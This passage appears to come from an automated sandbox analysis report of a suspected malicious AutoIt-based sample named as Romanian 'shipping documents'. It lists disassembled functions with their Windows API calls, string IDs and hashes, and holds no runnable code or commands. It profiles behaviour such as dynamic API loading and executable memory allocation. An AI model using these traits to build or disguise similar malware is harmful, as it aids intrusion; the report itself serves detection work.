                                                • Instruction Fuzzy Hash: BD919E715087119FCB18FF28D885CAEB7AAEF95700F00091EF4429B3A1DA20EE45CB66
                                                Function 006EB7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleSetContainedObject.OLE32(?,00000001), ref: 006EB981
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ContainedObject
                                                • String ID: AutoIt3GUI$Container$%r
                                                • API String ID: 3565006973-1282070598
                                                • Opcode ID: 7172350dbc2bfee3b58bb87e3226b0971f6823c7143a029e43b3d5b764a53a1e
                                                • Instruction ID: f43eeb77957064f35a17aacf865e32107262fe77e2500cd7cd80a91519044b40
                                                • Opcode Fuzzy Hash: 7172350dbc2bfee3b58bb87e3226b0971f6823c7143a029e43b3d5b764a53a1e
                                                • Instruction Fuzzy Hash: 4E914A706013019FDB64CF69C884AABBBEAFF49710F24956DE949CB7A1DB70E841CB50
                                                Function 006B524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                Download Yara Rule
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 006B52DD
                                                  • Part of subcall function 006C0340: __87except.LIBCMT ref: 006C037B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorHandling__87except__start
                                                • String ID: pow
                                                • API String ID: 2905807303-2276729525
                                                • Opcode ID: 68aa13a1957d75ef6a38b8e61df8b25f3387c3240aaf202bbd4f370a2da3ef97
                                                • Instruction ID: 509a759e69d6b0228ee80b7e85e8e20a5759bc4a509c85fb56bab92da07fbdab
                                                • Opcode Fuzzy Hash: 68aa13a1957d75ef6a38b8e61df8b25f3387c3240aaf202bbd4f370a2da3ef97
                                                • Instruction Fuzzy Hash: 8E5179A0A09602C6EB197724CA41BFA2BD6DB00350F20C95CE096823E5EB788DC5DB5A
                                                Function 006B023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #$+
                                                • API String ID: 0-2552117581
                                                • Opcode ID: 02b09016c750b34f7592ececa2264d6ed6de0adf1397e8c9f0f6f3cf5a80ee09
                                                • Instruction ID: f1a7451abe256e834e2b737c3ac7204426c6ee208c0a5bd0108876b40759f0f6
                                                • Opcode Fuzzy Hash: 02b09016c750b34f7592ececa2264d6ed6de0adf1397e8c9f0f6f3cf5a80ee09
                                                • Instruction Fuzzy Hash: 94513375106386DFEF259F29C8886FE7BAAEF19310F144055E8929B3A0C7349D82CB64
                                                Function 006A3297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove$_free
                                                • String ID: Oaj
                                                • API String ID: 2620147621-1426506063
                                                • Opcode ID: a2d9adafaf99bc2cb844cd967f2279cd6b74c6d64a24abd44cc60452b3878794
                                                • Instruction ID: e10434978a8dd49770c6382b4cc296f7c6c2a238a247c06214050063e277885a
                                                • Opcode Fuzzy Hash: a2d9adafaf99bc2cb844cd967f2279cd6b74c6d64a24abd44cc60452b3878794
                                                • Instruction Fuzzy Hash: FD514AB1A083519FDB24DF28C451B6ABBE6AF86304F04492DF98987351EB31EE41CF52
                                                Function 006A62F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memset$_memmove
                                                • String ID: ERCP
                                                • API String ID: 2532777613-1384759551
                                                • Opcode ID: af3a0d62436b034a1c56f0ba9770b9208ae1b1e70ffaafe09879a539b53d780c
                                                • Instruction ID: cad46537864313b9d0b7057fd7d48f5ec010587d9cc8ac090cfc93a35dc2f3d6
                                                • Opcode Fuzzy Hash: af3a0d62436b034a1c56f0ba9770b9208ae1b1e70ffaafe09879a539b53d780c
                                                • Instruction Fuzzy Hash: 2D51AFB1900309DBDB24DF65C8817EABBF6EF09714F24856EE54ACA240E7709A85CF40
                                                Function 00717648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007176D0
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007176E4
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00717708
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: SysMonthCal32
                                                • API String ID: 2326795674-1439706946
                                                • Opcode ID: 62467167983b275f28cb7e8ca4415a3b5f3f35ed51e13e6a04cb5b0a357c4f8b
                                                • Instruction ID: 26087a065c31ad13c36323511ae0d004402d262ed31b302134f87691a4781e57
                                                • Opcode Fuzzy Hash: 62467167983b275f28cb7e8ca4415a3b5f3f35ed51e13e6a04cb5b0a357c4f8b
                                                • Instruction Fuzzy Hash: 97219F32600219ABDF15CE68CC46FEA3B79EF58714F110214FE156B1D0DAB9AC91CBA0
                                                Function 00716F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00716FAA
                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00716FBA
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00716FDF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$MoveWindow
                                                • String ID: Listbox
                                                • API String ID: 3315199576-2633736733
                                                • Opcode ID: ff3073289efa51db1f863aa6f129377ea171fc643fa69de1c191d9824fc4c36b
                                                • Instruction ID: dd48103239754ae48e55f5aca3731d88a1f979a8260f0decc3d480f1940268e9
                                                • Opcode Fuzzy Hash: ff3073289efa51db1f863aa6f129377ea171fc643fa69de1c191d9824fc4c36b
                                                • Instruction Fuzzy Hash: C3216232611118BFDF118F58DC85EEB37AEEF89754F118124F9149B1D0C675AC92CBA0
                                                Function 0071797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007179E1
                                                • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007179F6
                                                • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00717A03
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: msctls_trackbar32
                                                • API String ID: 3850602802-1010561917
                                                • Opcode ID: a7cc017f684979a60b679a68fa26f526512348155f2aa320fbfc77a9a9364451
                                                • Instruction ID: ceafb640a87c064a69c78077b315df715cbfa01288f07ca13bf801a605794e3e
                                                • Opcode Fuzzy Hash: a7cc017f684979a60b679a68fa26f526512348155f2aa320fbfc77a9a9364451
                                                • Instruction Fuzzy Hash: 5611E372244208BAEF149F78CC05FEB37A9EF89B64F114519FA41A60D0D275E891CB60
                                                Function 00694C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00694C2E), ref: 00694CA3
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00694CB5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetNativeSystemInfo$kernel32.dll
                                                • API String ID: 2574300362-192647395
                                                • Opcode ID: 377fb98622cf5724a56b02258d63338a8cbd8fe497a2d8944db8e174dd10d7a4
                                                • Instruction ID: f4815bf2157f65d08ab3a3577e6f780f9e9f6c925cb5d41e5b1edbcae27f0c86
                                                • Opcode Fuzzy Hash: 377fb98622cf5724a56b02258d63338a8cbd8fe497a2d8944db8e174dd10d7a4
                                                • Instruction Fuzzy Hash: 84D0C2B0500727DFCB204F38D908A8272EAAF00740B10C839D885C2690DA78C4C0C610
                                                Function 00694D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00694D2E,?,00694F4F,?,007562F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00694D6F
                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00694D81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-3689287502
                                                • Opcode ID: c19dcc6f56c938cce691912c92c6fcf0c90dd2b07cfabca79a62165c95477e54
                                                • Instruction ID: b4a102f30e957ff50e834f52e05a22293755e063f5b9b948a77bf0d91bbcecd9
                                                • Opcode Fuzzy Hash: c19dcc6f56c938cce691912c92c6fcf0c90dd2b07cfabca79a62165c95477e54
                                                • Instruction Fuzzy Hash: F9D0C270500713DFDB204F34D80868272D9BF00352B10C939D486C2790DB78C480CA10
                                                Function 00694D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,00694CE1,?), ref: 00694DA2
                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00694DB4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                • API String ID: 2574300362-1355242751
                                                • Opcode ID: 5135ff84acd3144672275205648e0f3fd6f0494d19836fd8eb1b55520d195bb0
                                                • Instruction ID: 2c9b7568721b059ed21f28c4a3f4d0ac7a296c6b9d773e6e6bf9b8d3ddd32e96
                                                • Opcode Fuzzy Hash: 5135ff84acd3144672275205648e0f3fd6f0494d19836fd8eb1b55520d195bb0
                                                • Instruction Fuzzy Hash: DBD0C270510713DFDB204F34D808AC672D9AF04340B00C839D8C5C2690DB78C880C610
                                                Function 00711072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,007112C1), ref: 00711080
                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00711092
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                • API String ID: 2574300362-4033151799
                                                • Opcode ID: a67512930105175822046792f4ca56c9203074f93004c7ad423a763b656acc29
                                                • Instruction ID: 4709f43c1796085d186d48ee5ad9b0261164fd2db3af690e5883061880f4792f
                                                • Opcode Fuzzy Hash: a67512930105175822046792f4ca56c9203074f93004c7ad423a763b656acc29
                                                • Instruction Fuzzy Hash: E3D01770910B16DFD7209F39D818A9A76E4BF09761B51CC3AE48ADA190E7B8C8C0CA50
                                                Function 007093F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00709009,?,0071F910), ref: 00709403
                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00709415
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                • API String ID: 2574300362-199464113
                                                • Opcode ID: eab8e49b35ec301683ae2a069100417850ba10bac25ebc42ff32d0b99b502a8c
                                                • Instruction ID: c98572201353c6978a6d08c6d2e64a1ab0273ea857e9d19dbaa46caa60b9e397
                                                • Opcode Fuzzy Hash: eab8e49b35ec301683ae2a069100417850ba10bac25ebc42ff32d0b99b502a8c
                                                • Instruction Fuzzy Hash: 9DD0C7B0504B27EFCB208F38D90828372E6AF00341B21C83AE886C26D0E77CC880CA20
                                                Function 006D1B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: LocalTime__swprintf
                                                • String ID: %.3d$WIN_XPe
                                                • API String ID: 2070861257-2409531811
                                                • Opcode ID: 6fcfdcb8d96ffa82978a3dc4a317785d703a2373492ce3a33ea453926cdb616c
                                                • Instruction ID: abad12929e980bf29ab57e15993f026933ee053abeb0c3c80078d27bdb065eae
                                                • Opcode Fuzzy Hash: 6fcfdcb8d96ffa82978a3dc4a317785d703a2373492ce3a33ea453926cdb616c
                                                • Instruction Fuzzy Hash: D7D012B1D44118FACB449B909C44CF9737EA705311F104597F50299540F3B49B869B25
                                                Function 006E76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d48d461c34593fd73d4dbc3fec4a6203cc7486d793842d435b3ed71ce41aeb42
                                                • Instruction ID: 6aee2f7f728005af53b92c2fafc0af0b8af6bd8a10defcaa126f41400a4f6269
                                                • Opcode Fuzzy Hash: d48d461c34593fd73d4dbc3fec4a6203cc7486d793842d435b3ed71ce41aeb42
                                                • Instruction Fuzzy Hash: FCC16D74A05256EFCB14CF99C884EAEB7B6FF48710B1185A8E805EB351D730ED81CB90
                                                Function 0070E33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CharLowerBuffW.USER32(?,?), ref: 0070E3D2
                                                • CharLowerBuffW.USER32(?,?), ref: 0070E415
                                                  • Part of subcall function 0070DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0070DAD9
                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0070E615
                                                • _memmove.LIBCMT ref: 0070E628
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                • String ID:
                                                • API String ID: 3659485706-0
                                                • Opcode ID: 47f7872f05c1ffb2e4963d6a56bb2d970dfce9da26b963016aa811bc0f8bef53
                                                • Instruction ID: a0b7b2f0edc6ff00ae9e574579d17384ab69abd37f489f76295c72895ee1f202
                                                • Opcode Fuzzy Hash: 47f7872f05c1ffb2e4963d6a56bb2d970dfce9da26b963016aa811bc0f8bef53
                                                • Instruction Fuzzy Hash: 91C16AB1608341DFCB54DF28C48096ABBE5FF88314F148A6DF8999B391D735E946CB82
                                                Function 007083A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 007083D8
                                                • CoUninitialize.OLE32 ref: 007083E3
                                                  • Part of subcall function 006EDA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 006EDAC5
                                                • VariantInit.OLEAUT32(?), ref: 007083EE
                                                • VariantClear.OLEAUT32(?), ref: 007086BF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                • String ID:
                                                • API String ID: 780911581-0
                                                • Opcode ID: 224195d4d6cca6589dd03c9b81943bad7e25c335e78b3db10b4d050cf6aaa967
                                                • Instruction ID: bb93df305ca02e1c78acfc2809c87483e5b1b45dbc9adcd34a54345e8b4651bc
                                                • Opcode Fuzzy Hash: 224195d4d6cca6589dd03c9b81943bad7e25c335e78b3db10b4d050cf6aaa967
                                                • Instruction Fuzzy Hash: D5A14975204701DFCB90DF18C881A1AB7E9BF88314F09854DF99A9B7A2CB34ED00CB5A
                                                Function 006E6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
